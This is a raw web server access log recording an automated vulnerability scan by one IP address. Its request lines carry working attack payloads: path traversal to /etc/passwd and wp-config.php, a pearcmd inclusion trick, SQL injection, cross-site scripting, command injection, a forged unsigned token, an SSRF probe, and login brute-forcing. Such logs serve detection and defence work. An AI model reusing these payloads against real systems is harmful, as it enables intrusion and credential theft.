195.164.49.69 - - [20/Oct/2024:15:57:54 +0000] GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:57:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:57:58 +0000] GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+mpwtaKrzZP.log HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:58:02 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:58:04 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:58:04 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:58:04 +0000] POST /module/ HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:58:10 +0000] GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:58:14 +0000] POST /_adminer/index.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:58:14 +0000] POST /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:58:14 +0000] POST /adminer/adminer.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:58:14 +0000] POST /adminer/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:58:15 +0000] POST /_adminer.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:58:15 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:58:31 +0000] GET /file/../../../../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:58:31 +0000] GET /file/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:58:32 +0000] GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:58:40 +0000] POST /alerts/alertConfigField.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:58:42 +0000] POST /admin/asign-single-student-subjects.php HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:15:58:43 +0000] POST /admin/ajax.php?action=login HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:58:45 +0000] GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:58:47 +0000] GET /set_safety.shtml?r=52300 HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:58:49 +0000] GET /login.zul HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:58:53 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:58:55 +0000] GET /api/auth/cognito/callback?access_token=gehheads&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJjb2duaXRvOnVzZXJuYW1lIjoiaGpkanJ5eHpnaCIsImVtYWlsIjoie3tlbWFpbH19In0=. HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:59:01 +0000] GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:15:59:05 +0000] GET /chaosblade?cmd=$(id) HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:59:08 +0000] GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:15:59:10 +0000] POST /component_server HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:59:12 +0000] GET /file=text/css HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:59:14 +0000] POST /component_server HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:59:15 +0000] GET /file= HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:59:17 +0000] GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:15:59:18 +0000] POST /api/users HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:59:21 +0000] GET /index.php?noAUTO=1 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:59:23 +0000] GET /login.rst HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:59:25 +0000] POST /cgi-bin/cstecgi.cgi HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:59:27 +0000] GET /MqrBlV.txt HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:59:34 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:59:34 +0000] GET /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:59:35 +0000] GET /xmlrpc.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:59:35 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:15:59:35 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:59:35 +0000] GET /php-info.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:59:36 +0000] GET /php_info.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:59:36 +0000] GET /phpinfo.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:59:36 +0000] GET /info.php HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:59:36 +0000] GET /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:59:36 +0000] GET /xmlrpc.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:59:37 +0000] GET /cpanel.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:59:37 +0000] GET /bin/cron.php HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:59:37 +0000] GET /cache/index.tpl.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:59:57 +0000] GET /html/usr/share/doc/hostname/copyright%3f HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:15:59:59 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:00:01 +0000] GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:00:03 +0000] POST /device/description_en.html HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:00:07 +0000] POST /jtcgi/soap_cgi.pyc HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:00:09 +0000] POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:16:00:11 +0000] POST /login.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:00:18 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:00:19 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:00:22 +0000] POST /cgi-bin/dispatcher.cgi?cmd=3 HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:00:24 +0000] POST /cgi-bin/dispatcher.cgi?cmd=1 HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:00:26 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:00:28 +0000] POST /bonita/loginservice?redirect=true&redirectUrl=%2Fbonita%2Fapps%2FappDirectoryBonita HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:00:30 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:00:31 +0000] POST /dip/api/login HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:00:33 +0000] POST /data/login HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:00:36 +0000] POST /content.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:00:37 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:00:39 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:00:39 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:00:39 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:00:39 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:00:39 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:00:40 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:00:40 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:00:40 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:00:40 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:00:40 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:00:40 +0000] POST /Users/authenticatebyname HTTP/1.1 404 1102
83.212.98.101 - - [20/Oct/2024:16:00:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:16:01:01 +0000] GET /?controller=AuthController&action=login HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:01:05 +0000] GET /nagios/side.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:01:05 +0000] GET /nagios/side.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:01:09 +0000] GET /backend/backend/auth/signin HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:16:01:13 +0000] POST /index.php?m=login&a=attemptLogin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:01:13 +0000] POST /index.php?m=login&a=attemptLogin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:01:14 +0000] POST /index.php?m=login&a=attemptLogin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:01:14 +0000] POST /index.php?m=login&a=attemptLogin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:01:21 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:01:25 +0000] GET /login?arg1=YWRtaW4%3D&arg2=dGltZWtlZXBlcg%3D%3D HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:01:27 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:01:31 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:16:01:34 +0000] POST /xxl-job-admin/login HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:01:35 +0000] GET /admin/phpMyAdmin/server_import.php HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:16:01:36 +0000] GET /phpmyadmin/server_import.php HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:01:37 +0000] GET /pma/server_import.php HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:01:37 +0000] GET /phpMyAdmin%202/server_import.php HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:16:01:37 +0000] GET /db/server_import.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:01:37 +0000] GET /server_import.php HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:01:38 +0000] GET /PMA/server_import.php HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:01:38 +0000] GET /admin/server_import.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:01:38 +0000] GET /admin/pma/server_import.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:16:01:38 +0000] GET /phpMyAdmin/server_import.php HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:01:55 +0000] PUT /testing-put.txt HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:16:01:57 +0000] GET /testing-put.txt HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:01:59 +0000] POST /CDGServer3/NoticeAjax;Service HTTP/1.1 404 1107
zlrzvo.xff"> - - [20/Oct/2024:16:02:01 +0000] GET /?ltvrvs=1 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:02:03 +0000] GET /?ltvrvs=1 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:02:07 +0000] GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:02:09 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:16:02:12 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:02:15 +0000] GET /csz-cms/plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:02:17 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:02:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:02:21 +0000] GET /_404_%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:16:02:23 +0000] GET /status%3E%3Cscript%3Ealert(7331)%3C%2Fscript%3E HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:16:02:25 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:16:02:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:16:02:27 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:03:00 +0000] GET /product-details.php?id=1%20AND%20(SELECT%206812%20FROM%20(SELECT(SLEEP(6)))DddL) HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:03:02 +0000] POST /search HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:03:06 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:03:08 +0000] GET /wp-content/uploads/p3d/2nhz0c19UftbJg7RFlXDU9XcGsI.php HTTP/1.1 404 1140
195.164.49.69 - - [20/Oct/2024:16:03:10 +0000] POST /wp-admin/admin-post.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:03:12 +0000] GET /wp-json/ HTTP/1.1 404 1086
- - - [20/Oct/2024:16:03:14 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:03:16 +0000] POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:16:03:18 +0000] GET /tplus/img/login/2nhz0f646i0vni4vavWa75CXn5c.jpg HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:16:03:19 +0000] POST /cli?remoting=false HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:16:03:19 +0000] POST /cli?remoting=false HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:16:03:51 +0000] GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1 404 1141
195.164.49.69 - - [20/Oct/2024:16:03:53 +0000] GET /../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:16:03:55 +0000] GET /install.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:03:57 +0000] GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:03:59 +0000] GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:04:01 +0000] GET /interlib/report/ShowImage?localPath=etc/passwd HTTP/1.1 404 1107
- - - [20/Oct/2024:16:04:03 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:04:05 +0000] GET /download.do?file=../../../../config.text HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:04:07 +0000] GET /index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:04:09 +0000] GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:04:11 +0000] GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1 404 1138
195.164.49.69 - - [20/Oct/2024:16:04:13 +0000] GET /jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22 HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:04:15 +0000] GET /perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4 HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:16:04:17 +0000] GET /usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:04:19 +0000] GET /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:04:21 +0000] GET /cache/backup/ HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:04:23 +0000] GET /view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=lhand.txt HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:04:24 +0000] GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:16:04:27 +0000] GET /%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:16:04:29 +0000] GET /_profiler/empty/search/results?limit=10 HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:16:04:31 +0000] GET /app_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:04:33 +0000] GET /index.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:16:04:35 +0000] GET /index_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:16:04:37 +0000] GET /dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1128
195.164.49.69 - - [20/Oct/2024:16:04:39 +0000] GET /debug.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:16:04:41 +0000] GET /_debug/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:16:04:43 +0000] GET /web/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:16:04:45 +0000] GET /public/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:16:04:47 +0000] GET /frontend_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1137
195.164.49.69 - - [20/Oct/2024:16:04:49 +0000] GET /backend_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:16:04:51 +0000] GET /api_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:04:53 +0000] GET /app.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1128
195.164.49.69 - - [20/Oct/2024:16:04:55 +0000] GET /app_test.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:16:04:57 +0000] GET /test.php/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:16:04:59 +0000] GET /symfony/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1128
195.164.49.69 - - [20/Oct/2024:16:05:01 +0000] GET /debug/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:16:05:03 +0000] GET /dev/_profiler/empty/search/results?limit=10 HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:16:05:05 +0000] GET /profiler/empty/search/results?limit=10 HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:05:06 +0000] GET /api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml HTTP/1.1 404 1200
195.164.49.69 - - [20/Oct/2024:16:05:08 +0000] GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:16:05:10 +0000] GET /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:05:12 +0000] GET /api/Image/withpath/C:%5CWindows%5Cwin.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:16:05:14 +0000] GET /var/resource_config.json HTTP/1.1 404 1102
- - - [20/Oct/2024:16:05:16 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:05:18 +0000] GET /front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:16:05:20 +0000] GET /front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:16:05:22 +0000] GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1 404 1184
195.164.49.69 - - [20/Oct/2024:16:05:24 +0000] GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:16:05:26 +0000] GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:05:28 +0000] GET /admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:16:05:30 +0000] GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1 404 1150
195.164.49.69 - - [20/Oct/2024:16:05:32 +0000] GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type&file=passwd HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:05:34 +0000] GET /v1/cs/configs?export=true&group&tenant&appName&ids&dataId HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:05:36 +0000] GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1 404 1083
- - - [20/Oct/2024:16:05:38 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:05:40 +0000] GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:05:42 +0000] GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:16:05:44 +0000] GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
83.212.98.101 - - [20/Oct/2024:16:05:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:16:05:46 +0000] GET /admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:05:48 +0000] GET /admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:05:50 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:05:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:05:54 +0000] GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1149
195.164.49.69 - - [20/Oct/2024:16:05:57 +0000] GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:16:05:59 +0000] GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:16:06:00 +0000] GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1 404 1100
- - - [20/Oct/2024:16:06:02 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:06:04 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:06:06 +0000] GET /welcome HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:06:08 +0000] GET /portal/conf/config.properties HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:06:10 +0000] GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:06:12 +0000] GET /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.1 404 1141
195.164.49.69 - - [20/Oct/2024:16:06:14 +0000] GET /api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:06:16 +0000] GET /install/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:06:18 +0000] GET /install/make-config.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:06:20 +0000] GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:06:22 +0000] GET /debug/pprof/ HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:06:24 +0000] GET /debug/pprof/goroutine?debug=1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:06:26 +0000] GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:06:28 +0000] GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:06:30 +0000] GET /install/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:06:32 +0000] GET /backend/admin/users?username=anonymous HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:06:34 +0000] GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:16:06:36 +0000] GET /msa/../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:16:06:38 +0000] GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:16:06:40 +0000] GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1169
- - - [20/Oct/2024:16:06:42 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:06:44 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:06:46 +0000] GET /mongo-express/ HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:06:48 +0000] GET /db/admin/system.users HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:16:06:50 +0000] GET /storage/logs/laravel.log HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:06:52 +0000] GET /install/index.php HTTP/1.1 404 1095
